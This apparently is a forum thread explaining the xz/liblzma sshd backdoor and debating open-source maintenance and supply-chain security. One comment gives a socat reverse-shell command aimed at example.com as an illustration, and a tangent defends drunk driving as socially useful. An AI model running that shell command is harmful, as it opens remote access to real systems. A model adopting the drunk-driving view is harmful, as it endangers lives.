If anything, I'd expect it to be an even bigger risk, because when (not if) a security issue is found in the hardware, you now have no way to fix it, other than throwing out this server/fridge/toothbrush or whatever is running it.
A flashable secure enclave segment in the hardware stack is an option to patch around embedded bugs.
I haven’t worked in hardware design since the era of Nortel, and it was way different back then but the general physics are the same; if, else, while, and math operations in the hardware are not hard.
In fact your hardware is a general while loop; while has power, iterate around refreshing these memory states with these computed values, even in the absence of user input (which at the root is turning it on).
Programmers have grown accustomed to being necessary to running ignorant business machines but that’s never been a real requirement. Just a socialized one. And such memes are dying off.
Which will make updates either expensive or impossible. You will be able to write books about exploitable bugs in the hardware, and those books will easily survive several editions.
Siblings saying "we don't know" haven't really groked the post I don't think.
If I'm understanding the thread correctly, here's a (not so) succinct explanation. Please, if you know better than I do, correct me if I've made an error in my understanding.
`system()` is a standard C function that takes a string as input and runs it through `sh`, like so:
sh -c "whatever input"
It's used as a super rudimentary way to run arbitrary shell commands from a C program, using the `execl()` call under the hood, just like you'd run them on a bash/sh/fish/zsh/whatever command line.
system("echo '!dlroW ,olleH' | rev");
Those commands run mostly in the same privilege context as the process that invoked `system()`. If the call to `system()` came from a program running as root, the executed command is also run as root.
The backdoor utilizes this function in the code that gets injected into `sshd` by way of liblzma.so, a library for the LZMA compression algorithm (commonly associated with the `.xz` extension). Jia Tan, the person at the center of this whole back door, has been a maintainer of that project for several years now.
Without going too much into how the injected code gets into the `sshd` process, the back door inserts itself into the symbol lookup process earlier than other libraries, such as libcrypto and openssl. What this means is (and I'm over-simplifying a lot), when the process needs to map usages of e.g. `SSL_decrypt_key()` that were linked to dynamic libraries (as opposed to be statically linked and thus included directly into `sshd`), to real functions, it does a string-wise lookup to see where it can find it.
It runs through a list of dynamic libraries that might have it and sees if they export it. If they do, it gets the address of the exported function and remembers where it's at so that further calls to that function can be found quickly, without another search. This is how DLLs and SOs (dynamic libraries) are linked to the process that needs them at runtime without the process needing to know exactly where the functions that they need are located.
The back door hijacks this mechanism to insert its own functions in some of those places, so that when `sshd` thinks it's calling `SSL_decrypt_key()`, it's really calling some malicious function in the back door - which can then choose to do something with the data passed to the function call, or it can choose to forward the call to the real function.
It makes use of this when `sshd` needs to validate RSA information passed to the server via a client connection during authentication. An RSA key has a bunch of fields, one of which is the 'n' field - the public key data itself. OpenSSL implements this as a BIGNUM, or a variable-length, potentially very large number. It's more or less read in as a bag of bytes, and its meaning depends on the underlying encryption algorithm. This is the mechanism behind "public key authentication" when connecting to servers, and is generally more secure than e.g. username/password authentication.
The back door intercepts the call to check the RSA data, pulls out the 'n' parameter, and tries to decrypt it using ChaCha20. There's no way for it to know if it's decrypted beforehand, but generally encryption algorithms have a way to error-check and report failures - that, or you add some well known piece of information into the encrypted data that you can verify once it's decrypted.
Either way, the back door checks to see if it's really an encrypted string. If not, it forwards the call back to the original RSA check mechanism so that sshd can process it normally.
However, if the decryption succeeds, the back door passes the decrypted string to `system()`. This means that a random client connecting to an SSH server can craft an RSA public key that is really an encrypted, malicious payload to run any arbitrary shell command under which the same user `sshd` is running - oftentimes root.
Not only that, but the back door also checks the incoming RSA structure to see if it's coming from the person who made it. This prevents any of us finding this exploit and using it ourselves, even if we know our target is infected. It's a completely exclusive back door to whomever holds the private key used by the back door to sort of 'authenticate' the exploit itself.
This is much worse than what many of us thought it was before - a public key auth bypass - which would have meant that you'd only gain access to any user allowed to log in via SSH. SSH's configuration file has a setting that disables root logins under any circumstances that is generally enabled on production systems for obvious reasons. However, with it being an RCE, SSH servers running as root would execute the payloads as root.
From there, they could easily run socat and have the system connect to a server of their choice to gain a remote interactive shell, for example:
socat TCP:example.com:1234 SYSTEM:"bash -l"
The possibilities are really endless. They'd effectively have a skeleton key that only they could use (or sell) that, with enough time for people to upgrade their version of `sshd`, would allow them access to just about any SSH server they could connect to, oftentimes with root permissions.
> Siblings saying "we don't know" haven't really groked the post I don't think.
The reason for saying "we don't know" is not that we don't understand what's detailed in TFA, but that the backdoor embeds a 88 kB object file into liblzma, and nobody has fully reverse engineered and understood all that code yet. There might be other things lurking in there.
> They'd effectively have a skeleton key that only they could use (or sell) that
this looks more like state sponsored attack and it doesn't look like someone joining and at one point realizing they want to implement this backdoor.
The guy joined the project 2 years ago, developed a test framework (which he then used to hide binary of the backdoor in which appears that is complex and others are still figuring out how it works) then he gradually disabled various security checks before activating it.
Thank you for the detailed write up. This made me think, why do we actually let sshd run as root?
Would it be possible to only run a very unsophisticated ssh server as root that depending on the user specified in the incoming connection just coordinates that connection to the actual user and let the server run there? This could be so simplistic that a backdoor would more easily be detected.
Attacker wants to be able to send an especially crafted public key to their target's server's sshd. That crafted key is totally bogus input, a normal sshd would just probably reject it as invalid. The bits embedded into the key are actually malicious code, encrypted/signed with the attacker's secret key.
In order to achieve their objective, they engineered a backdoor into sshd that hooks into the authentication functions which handle those keys. Whenever someone sends a key, it tries to decrypt it with the attacker's keys. If it fails, proceed as usual, it's not a payload. If it successfully decrypts, it's time for the sleeper agent to wake up and pipe that payload into a brand new process running as root.
It baffles me how such an important package that so many Linux servers use every day is unmaintained by the original author due to insufficient funds. Something gotta change in OSS. I think one solution could be in licenses that force companies/business of certain sizes to pay maintenance fees. One idea from the top of my head.
That's why I think such OSS packages should use licenses that force large companies to pay (moderate) fees for maintenance. I assume such sums of money won't even tickle them.
Imagine 10 large companies, each pay $1000 a month for critical packages they use. For each developer, that's $10,000 they can either use to quit their current job or hire another person to share the burden.
You may as well just slap a "no commercial use" restriction on it. It takes months to go through procurement at the average big company, and still would if the package cost $1. Developers at these companies will find something else without the friction.
I’m not an expert on this. if it ticks all the legal and other issues big companies need to deal with in a frictionless manner, then that’s good. If not, maybe a different solution is needed.
You are conflating convenience with necessity. Currently large companies also use xz simply because it is configured to be the default in many distributions. If it charges them money, they will just move to zstd, brottoli, gzip or 7z. The first two are backed by large companies themselves who will not adopt these kind of licenses ever.
Not really. Just make your software AGPLv3. It's literally the most free license GNU and the FSF have ever come up with. It ensures your freedom so hard the corporations cannot tolerate it. Now you have leverage. If the corporations want it so bad, they can have it. They just gotta ask for permission to use it under different terms. Then they gotta pay for it.
All you have to do is not MIT or BSD license the software. When you do that, you're essentially transferring your intellectual property to the corporations at zero cost. Can't think of a bigger wealth transfer in history. From well meaning individual programmers and straight to the billionaires.
The BSD style openness only makes sense in a world without intellectual property. Until the day copyright is abolished, it's either AGPLv3 or all rights reserved. Nothing else makes sense.
The problem is, there will be almost zero packages that (very few) "corporations want so bad". The only exception might be cloud providers, that want to host your mildly-popular open-source message queue, but, again, if you are Amazon, you'll soon just re-implement that message queue, drop the "original" one, and after a couple of years your mildly-popular project will become not popular at all.
> It baffles me how such an important package that so many Linux servers use every day is unmaintained by the original author due to insufficient funds.
Is it actually insufficient funds or is it burnout?
I'm not sure. I know from working on OSS projects personally that insufficient funds can easily lead to burnout as well. You gotta find other sources of revenue while STILL maintaining your OSS project.
The proposed EU Cyber resilience Act positions itself to be a solution. To put it simply, vendors are responsible for vulnerabilities throughout the lifetime of their products, whether that is a firewall or a toaster. Thus, the vendors are incentives to keep OSS secure, whether that means paying maintainers, commissioning code audits or hiring FTEs to contribute.
It baffles me why something as complex as xz is apparently needed. The code for bzip2 is tiny and would need a small fraction of one person to maintain.
Currently if you visit the xz repository it is disabled for violating github's TOS.
While it should clearly be disabled, I feel like github should leave the code and history up, while displaying a banner (and disabled any features that could be exploited), so that researchers and others can learn about the exploit.
In more minor situations when a library is hosting malicious code, if I found the repo to be down I might not think anything of it.
If you are interested in the source code that is easy to find. This code and git repo are linked all over the world, in many git repos, and the source is bundled many times
in releases as well.
As a de facto maintainer of an obscure open source game, I see devs come and go. I just merge all the worthwhile contributions. Some collaborators go pretty deep with their features, with a variety of coding styles, in a mishmash of C and C++. I'm not always across the implementation details, but in the back of my mind I'm thinking, man, anyone could just code up some real nasty backdoor and the project would be screwed. Lucky the game is so obscure and the attack surface minuscule, but it did stop me from any temptation to sign Windows binaries out of any sense of munificence.
This xz backdoor is just the most massive nightmare, and I really feel for the og devs, and anyone who got sucked in by this.
> but in the back of my mind I'm thinking, man, anyone could just code up some real nasty backdoor and the project would be screwed
That's true of course, but it's not a problem specific to software. In fact, I'm not even sure it's a "problem" in a meaningful sense at all.
When you're taking a walk on a forest road, any car that comes your way could just run you over. Chances are the driver would never get caught. There is nothing you can do to protect yourself against it. Police aren't around to help you. This horror scenario, much worse than a software backdoor, is actually the minimum viable danger that you need to accept in order to be able to do anything at all. And yes, sometimes it does really happen.
But at the end of the day, the vast majority of people just don't seek to actively harm others. Everything humans do relies on that assumption, and always has. The fantasy that if code review was just a little tighter, if more linters, CI mechanisms, and pattern matching were employed, if code signing was more widespread, if we verified people's identities etc., if all these things were implemented, then such scenarios could be prevented, that fantasy is the real problem. It's symptomatic of the insane Silicon Valley vision that the world can and should be managed and controlled at every level of detail. Which is a "cure" that would be much worse than any disease it could possibly prevent.
> When you're taking a walk on a forest road, any car that comes your way could just run you over. Chances are the driver would never get caught. There is nothing you can do to protect yourself against it.
Sure you can. You can be more vigilant and careful when walking near traffic. So maybe don't have headphones on, and engage all your senses on the immediate threats around you. This won't guarantee that a car won't run you over, but it reduces the chances considerably to where you can possibly avoid it.
The same can be said about the xz situation. All the linters, CI checks and code reviews couldn't guarantee that this wouldn't happen, but they sure would lower the chances that it does. Having a defeatist attitude that nothing could be done to prevent it, and that therefore all these development practices are useless, is not helpful for when this happens again.
The major problem with the xz case was the fact it had 2 maintainers, one who was mostly absent, and the other who gradually gained control over the project and introduced the malicious code. No automated checks could've helped in this case, when there were no code reviews, and no oversight over what gets merged at all. But had there been some oversight and thorough review from at least one other developer, then the chances of this happening would be lower.
It's important to talk about probabilities here instead of absolute prevention, since it's possible that even in the strictest of environments, with many active contributors, malicious code could still theoretically be merged in. But without any of it, this approaches 100% (minus the probability of someone acting maliciously to begin with, having their account taken over, etc.).
It's not defeatist to admit and accept that some things are ultimately out of our control. And more importantly, that any attempt to increase control over them comes with downsides.
An open source project that imposes all kinds of restrictions and complex bureaucratic checks before anything can get merged, is a project I wouldn't want to participate in. I imagine many others might feel the same. So perhaps the loss from such measures would be greater than the gain. Without people willing to contribute their time, open source cannot function.
> It's not defeatist to admit and accept that some things are ultimately out of our control.
But that's the thing: deciding how software is built and which features are shipped to users _is_ under our control. The case with xz was exceptionally bad because of the state of the project, but in a well maintained project having these checks and oversight does help with delivering better quality software. I'm not saying that this type of sophisticated attack could've been prevented even if the project was well maintained, but this doesn't mean that there's nothing we can do about it.
> And more importantly, that any attempt to increase control over them comes with downsides.
That's a subjective opinion. I personally find linters and code reviews essential to software development, and if you think of them as being restrictions or useless bureaucratic processes that prevent you from contributing to a project then you're entitled to your opinion, but I disagree. The downsides you mention are simply minimum contribution requirements, and not having any at all would ultimately become a burden on everybody, lead to a chaotic SDLC, and to more issues being shipped to users. I don't have any empirical evidence to back this up, so this is also "just" my opinion based on working on projects with well-defined guidelines.
I'm sure you would agree with the Optimistic Merging methodology[1]. I'd be curious to know whether this has any tangible benefits as claimed by its proponents. At first glance, a project like https://github.com/zeromq/libzmq doesn't appear to have a more vibrant community than a project of comparable size and popularity like https://github.com/NixOS/nix, while the latter uses the criticized "Pessimistic Merging" methodology. Perhaps I'm looking at the wrong signals, but I'm not able to see a clear advantage of OM, while I can see clear disadvantages of it.
libzmq does have contribution guidelines[2], but a code review process is unspecified (even though it mentions having "systematic reviews"), and there are no testing requirements besides patches being required to "pass project self-tests". Who conducts reviews and when, or who works on tests is entirely unclear, though the project seems to have 75% coverage, so someone must be doing this. I'm not sure whether all of this makes contributors happier, but I sure wouldn't like to work on a project where this is unclear.
> Without people willing to contribute their time, open source cannot function.
Agreed, but I would argue that no project, open source or otherwise, can function without contribution guidelines that maintain certain quality standards.
> But that's the thing: deciding how software is built and which features are shipped to users _is_ under our control. The case with xz was exceptionally bad because of the state of the project, but in a well maintained project having these checks and oversight does help with delivering better quality software. I'm not saying that this type of sophisticated attack could've been prevented even if the project was well maintained, but this doesn't mean that there's nothing we can do about it.
In this particular case, having a static project or a single maintainer rarely releasing updates would actually be an improvement! The people/sockpuppets calling for more/faster changes to xz and more maintainers to handle that is exactly how we ended up with a malicious maintainer in charge in the first place. And assuming no CVEs or external breaking changes occur, why does that particular library need to change?
Honestly this is why I think we should pay people for open source projects. It is a tragedy of the commons issues. All of us benefit a lot from these free software, and done for free. Pay doesn't exactly fix the problems directly, but they do decrease the risk. Pay means people can work on these full time instead of on the side. Pay means it is harder to bribe someone. Pay also makes the people contributing feel better and more like their work is meaningful. Importantly, pay signals to these people that we care about them. I think the big tech should pay. We know the truth is that they'll pass on the costs to us anyways. I'd also be happy to pay taxes but that's probably harder. I'm not sure what the best solution is and this is clearly only a part of a much larger problem, but I think it is very important that we actually talk about how much value OSS has. If we're going to talk about how money represents value of work, we can't just ignore how much value is generated from OSS and only talk about what's popular and well know. There are tons of critical infrastructure in every system you could think of (traditional engineering, politics, anything) that is unknown. We shouldn't just pay things that are popular. We should definitely pay things that are important. Maybe the conversation can be different when AI takes all the jobs (lol)
I get why, in principle, we should pay people for open source projects, but I guess it doesn't make much of a difference when it comes to vulnerabilities.
First off, there are a lot of ways to bring someone to "the dark side". Maybe it's blackmail. Maybe it's ideology ("the greater good"). Maybe it's just pumping their ego. Or maybe it's money, but not that much, and extra money can be helpful. There is a long history of people spying against their country or hacking for a variety of reasons, even if they had a job and a steady paycheck. You can't just pay people and expect them to be 100% honest for the rest of their life.
Second, most (known) vulnerabilities are not backdoors. As any software developer knows, it's easy to make mistakes. This also goes for vulnerabilities. Even as a paid software developer, uou can definitely mess up a function (or method) and accidentally introduce an off-by-one vulnerability, or forget to properly validate inputs, or reuse a supposedly one-time cryptographic quantity.
I think it does make a difference when it comes to vulnerabilities and especially infiltrators. You're doing these things as a hobby. Outside of your real work. If it becomes too big for you it's hard to find help (exact case here). How do you pass on the torch when you want to retire?
I think money can help alleviate pressure from both your points. No one says that money makes them honest. But if it's a full time job you are less likely to just quickly look and say lgtm. You make fewer mistakes when you're less stress or tired. It's harder to be corrupted because people would rather a stable job and career than a one time payout. Pay also makes it easier to trace.
Again, it's not a 100% solution. Nothing will be! But it's hard to argue that this wouldn't alleviate significant pressure.
Difference is that software backdoors can effect billions of people. That driver on the road can't effect too many without being caught.
In this case, had they been a bit more careful with performance, they could have effected millions of machines without being caught. There aren't many cases where a lone wolf can do so much damage outside of software.
>But at the end of the day, the vast majority of people just don't seek to actively harm others. Everything humans do relies on that assumption, and always has.
Wholeheartedly agree. Fundamentally, we all assume that people are operating with good will and establish trust with that as the foundation (granted to varying degrees depending on the culture, some are more trusting or skeptical than others).
It's also why building trust takes ages and destroying it only takes seconds, and why violations of trust at all are almost always scathing to our very soul.
We certainly can account for bad actors, and depending on what's at stake (eg: hijacking airliners) we do forego assuming good will. But taking that too far is a very uncomfortable world to live in, because it's counter to something very fundamental for humans and life.
> But at the end of the day, the vast majority of people just don't seek to actively harm others. Everything humans do relies on that assumption, and always has.
> It's symptomatic of the insane Silicon Valley vision that the world can and should be managed and controlled at every level of detail. Which is a "cure" that would be much worse than any disease it could possibly prevent.
My personal opinion is that if something is going to find a way to conduct itself in secret anyway (at high risk and cost) if it is banned, it is always better to just suck it up and permit it and regulate it in the open instead. Trafficked people are far easier to discover in an open market than a black one. Effects of anything (both positive and negative) are far easier to assess when the thing being assessed is legal.
Should we ban cash because it incentivizes mugging and pickpocketing and theft? (I've been the victim of pickpocketing. The most valuable thing they took was an irreplaceable military ID I carried (I was long since inactive)... Not the $25 in cash in my wallet at the time.) I mean, there would literally be far fewer muggings if no one carried cash. Is it thus the cash's "fault"?
Captain's Log: This entire branch of comments responding to OP is not helping advance humanity in any significant way. I would appreciate my statement of protest being noted by the alien archeologists who find these bits in the wreckage of my species.
I think drunk driving being an oil that keeps society lubricated cannot and should not be understated.
Yes, drunk driving kills people and that's unacceptable. On the other hand, people going out to eat and drink with family, friends, and co-workers after work helps keep society functioning, and the police respect this reality because they don't arrest clearly-drunk patrons coming out of restaurants to drive back home.
This is such a deeply American take that I can't help but laugh out loud. It's like going to a developing nation and saying that, while emissions from two stroke scooters kills people there's no alternative to get your life things done.
It certainly isn't just America, though we're probably certainly the most infamous example.
I was in France for business once in the countryside (southern France), and the host took everyone (me, their employees, etc.) out to lunch. Far as I could tell it was just an everyday thing. Anyway, we drove about an hour to a nearby village and practically partied for a few hours. Wine flowed like a river. Then we drove back and we all got back to our work. So not only were we drunk driving, we were drunk working. Even Americans usually don't drink that hard; the French earned my respect that day, they know how to have a good time.
Also many times in Japan, I would invite a business client/supplier or a friend over for dinner at a sushi bar. It's not unusual for some to drive rather than take the train, and then of course go back home driving after having had lots of beer and sake.
Whether any of us like it or not, drunk driving is an oil that lubricates society.
Except they weren't irresponsible. We all drove back just fine, and we all went back to work just as competently as before like nothing happened.
It takes skill and maturity to have a good time but not so much that it would impair subsequent duties. The French demonstrated to me they have that down to a much finer degree than most of us have in America, so they have my respect.
This isn't to say Americans are immature, mind you. For every drunk driving incident you hear on the news, hundreds of thousands if not millions of Americans drive home drunk without harming anyone for their entire lives. What I will admit is Americans would still refrain from drinking so much during lunch when we still have a work day left ahead of us, that's something we can take lessons from the French on.
Life is short, so those who can have more happy hours without compromising their duties are the real winners.
As someone who knows people who died in a crash with another drunk driver, it is hard for me to accept your view. Certainly, at a bare minimum, the penalties for drunk driving that results in fatality should be much harsher than they are now -- at that point there is hard empirical evidence that you cannot be trusted to have the "skill and maturity" necessary for driving -- but we can't even bring ourselves to do that, not even for repeat offenders.
Eventually I am optimistic that autonomous driving will solve the problem entirely, at least for those who are responsible drivers. In an era of widely available self-driving cars, if you choose to drive drunk, then that is an active choice, and no amount of "social lubrication" can excuse such degenerate behavior.
I think the real problem is that people are really poor at assessing risk. And I think we can make some headway there, educationally, and it might actually affect how people reason around drunk driving (or their friends, assuming they still have their faculties).
Let's take the example of driving home drunk without hurting anyone or having an accident. Suppose that (being optimistic) there's a 1% chance of an accident and a 0.1% chance of causing a fatality (including to self). Seems like an easy risk to take, right? But observe what happens if you drive home drunk 40 times:
99% chance of causing no accident each time, to the 40th power = 0.99^40 is roughly 67% chance that none of those 40 times results in an accident. 80 times? 45% chance of no accident. Now you're talking about flipping a coin to determine whether you cause an accident (potentially a fatal one, we'll get to that) at all over 80 attempts. (I feel like that is optimistic.)
If I have a 99.9% chance of not killing someone when drunk-driving one time, after 80 times I have a 92% chance of not killing someone (that is, an 8% chance of killing someone). Again, this seems optimistic.
Try tweaking the numbers to a 2% chance of an accident and a 1.2% chance of causing a fatality.
Anyway, my point is that people are really terrible at evaluating the whole "re-rolling the dice multiple times" angle, since a single hit is a HUGE, potentially life-changing loss.
(People are just as bad at evaluating success risk, as well, for similar reasons- a single large success is a potentially life-changing event)
I'm certainly not trying to understate the very real and very serious suffering that irresponsible drunk drivers can and do cause. If any of this came off like that then that was never my intention.
When it comes to understanding drunk driving and especially why it is de facto tolerated by society despite its significant problems, it's necessary to consider the motivators and both positive and negative results. Simply saying "they are all irresponsible and should stop" and such with a handwave isn't productive. After all, society wouldn't tolerate a significant problem if there wasn't a significant benefit to doing so.
One of the well known effects of alcohol is impaired judgment. You're expecting people with some level of impaired judgment to make correct judgment calls. Skill and maturity can help, but are not a solution to that fundamental problem.
Would you be okay with a surgeon operating on you in the afternoon drinking at lunch and working on you later while impaired? Is it okay for every person and job to be impaired, regardless of the responsibility of their situation? If not, why is operating a few thousand pound vehicle in public that can easily kill multiple people when used incorrectly okay?
If it's American to make counterarguments based on reason instead of ridicule, then hell, I'd much prefer to be an American than whatever the hell your judgmental buttocks is doing.
And no, there is currently no substitute for a legal removal of your repression so that you can, say, get on with some shagging. I would love to see a study trying to determine what percentage of humans have only come into existence because of a bit of "social lubrication"
You can laugh out loud all you want, but there are mandatory parking minimums for bars across the USA.
Yes, bars have parking lots, and a lot of spaces.
The intent is to *drive* there, drink and maybe eat, and leave in some various state of drunkenness. Why else would the spacious parking lots be required?
What is more depressing is how we can acknowledge that reality and continue to do absolutely nothing to mitigate it but punish it, in many cases.
The more people practically need to drive, the more people will drunk drive and kill people, yet in so many cases we just sort of stop there and be like "welp, guess that's just nature" instead of building viable alternatives. However the other theoretical possibly is that if people didn't need to drive, they might end up drinking more.
Indeed, that "bias" is a vital mechanism that enables societies to function. Good luck getting people to live together if they look at passerbys thinking "there is a 0.34% chance that guy is a serial killer".
> What "cure" would you recommend?
Accepting that not every problem can, or needs to be, solved. Today's science/tech culture suffers from an almost cartoonish god complex seeking to manage humanity into a glorious data-driven future. That isn't going to happen, and we're better off for it. People will still die in the future, and they will still commit crimes. Tomorrow, I might be the victim, as I already have been in the past. But that doesn't mean I want the insane hyper-control that some of our so-called luminaries are pushing us towards to become reality.
The late author of ZeroMQ, Pieter Hintjens, advocated for a practice called Optimistic Merging[1], where contributions would be merged immediately, without reviewing the code or waiting for CI results. So your approach of having lax merging guidelines is not far off.
While I can see the merits this has in building a community of contributors who are happy to work on a project, I always felt that it opens the project to grow without a clear vision or direction, and ultimately places too much burden on maintainers to fix contributions of others in order to bring them up to some common standard (which I surely expect any project to have, otherwise the mishmash of styles and testing practices would make working on the project decidedly not fun). It also delays the actual code review, which Pieter claimed does happen, to some unknown point in the future, when it may or may not be exhaustive, and when it's not clear who is actually responsible of conducting it or fixing any issues. It all sounds like a recipe for chaos where there is no control over what eventually gets shipped to users. But then again, I never worked on ZeroMQ or another project that adopted these practices, so perhaps you or someone else here can comment on what the experience is like.
And then there's this issue of malicious code being shipped. This is actually brought up by a comment on that blog post[2], and Pieter describes exactly what happened in the xz case:
> Let's assume Mallory is patient and deceitful and acts like a valid contributor long enough to get control over a project, and then slowly builds in his/her backdoors. Then careful code review won't help you. Mallory simply has to gain enough trust to become a maintainer, which is a matter of how, not if.
And concludes that "the best defense [...] is size and diversity of the community".
Where I think he's wrong is that a careful code review _can_ indeed reduce the chances of this happening. If all contributions are reviewed thoroughly, regardless if they're authored by a trusted or external contributor, then strange behavior and commits that claim to do one thing but actually do something else, are more likely to be spotted earlier than later. While OM might lead to a greater community size and diversity, which I think is debatable considering how many projects exist with a thriving community of contributors while also having strict contribution guidelines, it doesn't address how or when a malicious patch would be caught. If nobody is in charge of reviewing code, there are no testing standards, and maintainers have additional work keeping some type of control over the project's direction, how does this actually protect against this situation?
The problem with xz wasn't a small community; it was *no* community. A single malicious actor got control of the project, and there was little oversight from anyone else. The project's contribution guidelines weren't a factor in its community size, and this would've happened whether it used OM or not.
> The problem with xz wasn't a small community; it was no community. A single malicious actor got control of the project, and there was little oversight from anyone else.
So because of this a lot of other highly used software was importing and depending on unreviewed code. It's scary to think how common this is. The attack surface seems unmanageable. There need to be tighter policies around what dependencies are included, ensuring that they meet some kind of standard.
> There need to be tighter policies around what dependencies are included, ensuring that they meet some kind of standard.
This is why it's a good practice to minimize the amount of dependencies, and add dependencies only when absolutely required. Taking this a step further, doing a cursory review of each dependency, seeing the transitive dependencies it introduces, are also beneficial. Of course, it's impractical to do this for the entire dependency tree, and at some point we have to trust that the projects we depend on follow this same methodology, but having a lax attitude about dependency management is part of the problem that caused the xz situation.
One thing that I think would improve this are "maintenance scores". A service that would scan projects on GitHub and elsewhere, and assign a score to each project that indicates how well maintained it is. It would take into account the number of contributors in the past N months, development activity, community size and interaction, etc. Projects could showcase this in a badge in their READMEs, and it could be integrated in package managers and IDEs that could warn users if adding a dependency that has a low maintenance score. Hopefully this would disuade people to use poorly maintained projects, and encourage them to use better maintained ones, or avoid the dependency altogether. It would also encourage maintainers to improve their score, and there would be higher visibility of projects that are struggling, but have a high user base, as potentially more vulnerable to this type of attack. And then we can work towards figuring out how to provide the help and resources they need to improve.
Does such a service/concept exist already? I think GitHub should introduce something like this, since they have all the data to power it.
That’s not an effective idea for the same reason that lines of code is not a good measure of productivity. It’s an easy measure to automate but it’s purely performative as it doesn’t score the qualitative value of any of the maintenance work. At best it encourages you to use only popular projects which is its own danger (software monoculture is cheaper to attack) without actually resolving the danger - this attack is reasonably sophisticated and underhanded that could be slipped through almost any code review.
One real issue is that xz’s build system is so complicated that it’s possible to slip things in which is an indication that the traditional autoconf Linux build mechanism needs to be retired and banned from distros.
But even that’s not enough because an attack only needs to succeed once. The advice to minimize your dependencies is an impractical one in a lot of cases (clearly) and not in your full control as you may acquire a surprising dependency due to transitiveness. And updating your dependencies is a best practice which in this case actually introduces the problem.
We need to focus on real ways to improve the supply chain. eg having repeatable idempotent builds with signed chain of trusts that are backed by real identities that can be prosecuted and burned. For example, it would be pretty effective counter incentive for talent if we could permanently ban this person from ever working on lots of projects. That’s typically how humans deal with members of a community who misbehave and we don’t have a good digital equivalent for software development. Of course that’s also dangerous as blackball environments tend to become weaponized.
> We need to focus on real ways to improve the supply chain. eg having repeatable idempotent builds with signed chain of trusts that are backed by real identities that can be prosecuted and burned.
So, either no open source development because nobody will vouch to that degree for others, or absolutely no anonymity and you'll have to worry about anything you provide because of you screw up and introduce a RCE all of a sudden you'll have a bunch of people and companies looking to say it was on purpose so they don't have to own up to any of their own poor practices that allowed it to actually be executed on?
You don’t need vouching for anyone. mDL is going to be a mechanism to have a government authority vouch your identity. Of course a state actor like this can forge the identity, but that forgery at least will give a starting point for the investigation to try to figure out who this individual is. There’s other technical questions about how you verify that the identity really is tied in some real way to the user at the other end (eg not a stolen identity) but there are things coming down that will help with that (ie authenticated chains of trust for hw that can attest the identity was signed on the given key in person and you require that attestation).
As for people accusing you of an intentional RCE, that may be a hypothetical scenario but I doubt it’s very real. Most people have a very long history of good contributions and therefore have built up a reputation that would be compared against the reality on the ground. No one is accusing Lasse Collin of participating in this even though arguably it could have been him all along for what anyone knows.
It doesn’t need to be perfect but directionally it probably helps more than it hurts.
All that being said, this clearly seems like a state actor which changes the calculus for any attempts like this since the funding and power is completely different than what most people have access to and likely we don’t have any really good countermeasures here beyond making it harder for obfuscated code to make it into repositories.
Your idea sounds nice in theory, but it's absolutely not worth the amount of effort. To put it in perspective, think about xz case, and how the amount of contributions would have prevented the release artifact (tar file) from being modified? Because other people would have used the tar file? Why? The only ones that use tarfiles are the ones that would be redistributing the code, they will not audit it. The ones that could audit it would look at the version system repository, not at the tar files. In other words, your solution wouldn't even be effective at potentially discovering this issue.
The only thing that would effectively do this, is that people stop trusting build artifacts and instead use direct from public repositories packaging. You could figure out if someone maliciously modified the release artifact by comparing it against the tagged version, but at that point, why not just shallow clone the entire thing and be done.
Even if you mandated two code reviewers per merge, the attacker can just have three fake personas backed by the same single human and use them to author and approve malware.
Also, in a more optimistic scenario without sockpuppets, it's unlikely that malicious and underhanded contributions will be caught by anyone that isn't a security researcher.
It's actually an art to writing code like that, but it's not impossible and will dodge cursory inspection. And it's possible to have plausible deniability in the way it is constructed.
I'm not sure why my point is not getting across...
I'm not saying that these manual and automated checks make a project impervious to malicious actors. Successful attacks are always a possibility even in the strictest of environments.
What they do provide is a _chance reduction_ of these attacks being successful.
Just like following all the best security practices doesn't produce 100% secure software, neither does following best development practices prevent malicious code from being merged in. But this doesn't mean that it's OK to ignore these practices altogether, as they do have tangible benefits. I argue that projects that have them are better prepared against this type of attack than those that do not.
It never ceases to amaze me how great of lengths companies go to round securing the perimeter of the network but then have engineering staffs that just routinely brew install casks or vi/emacs/vscode/etc extensions.
Rust is arguably the programming language and/or community with the most secure set of defaults that are fairly impossible to get out of, but even at “you can’t play games with pointers” levels of security-first, the most common/endorsed path for installing it (that I do all the time because I’m a complete hypocrite) is:
and that’s just one example, “yo dawg curl this shit and pipe it to sh so you can RCE while you bike shed someone’s unsafe block” is just muscle memory for way too many of us at this point.
It’s worse than that. Build.rs is in no way sandboxed which means you can inject all sorts of badness into downstream dependencies not to mention do things like steal crypto keys from developers. It’s really a sore spot for the Rust community (to be fair they’re not uniquely worse but that’s a fact poor standard to shoot for).
> yo dawg curl this shit and pipe it to sh so you can RCE while you bike shed someone’s unsafe block
Ahhh this takes me back to... a month ago...[0]
At least rust wraps function in main so you won't run a partial command, but still doesn't there aren't other dangers. I'm more surprised by how adamant people are about that there's no problem. You can see elsewhere in the thread that piping man still could (who knows!) pose a risk. Extra especially when you consider how trivial the fix is, especially when people are just copy pasting the command anyways...
It never ceases to amaze me how resistant people are to very easily solvable problems.
To be honest, it just was a matter of time till we find out our good faith beliefs are exploited.
Behaviors like "break fast and fix eary" or "who wants to take my peojeklct ownership" just ask for trouble and yet it's unthinkable to live without them because open source is an unpaid labor of love to code.
Sad to see such happening but I'm not surprised. I wish to get better tools (also open source) to combat such bad actors.
Thanks to all the researchers out there who tries to protect us all.
dont you think that something as simple as a CLA (contributor legal agreement) would prevent this type of thing? of course creates noise in the open source contribution funnel, but let's be honest: if you are dedicating yourself to something like contributing to oss, signing a CLA should not be something unrealistic.
That's stretching the traditional definition. Usually CLAs are solely focused on addressing the copyright conditions and intellectual property origin of the contributed changes. Maybe just "contributor agreement" or "contributor contract" would describe that.
What exactly is a CLA going to do to a CCP operative (as appears to be the case with xz)? Do you think the party is going to extradite one of their state sponsored hacking groups because they got caught trying to implement a backdoor?
Or do you think they don’t have the resources to fake an identity?
There was a link in this thread pointing to commit times analysis and it kinda checks out. Adding some cultural and outside world context, I can guess which alphabet this three-four-six-letter agency uses to spell it's name at least.
case closed. you are right... could of course make the things a bit more difficult for someone not backed by a state sponsor. but if that's the case, you are right.
- what other ones exist by this same team or similar teams?
- how many such teams are operating?
- how many such dependencies are vulnerable to such infiltration attacks? what is our industry’s attack surface for such covert operations?
I think making a graph of all major network services (apache httpd, postgres, mysql, nginx, openssh, dropbear ssh, haproxy, varnish, caddy, squid, postfix, etc) and all of their dependencies and all of the committers to all of those dependencies might be the first step in seeing which parts are the most high value and have attracted the least scrutiny.
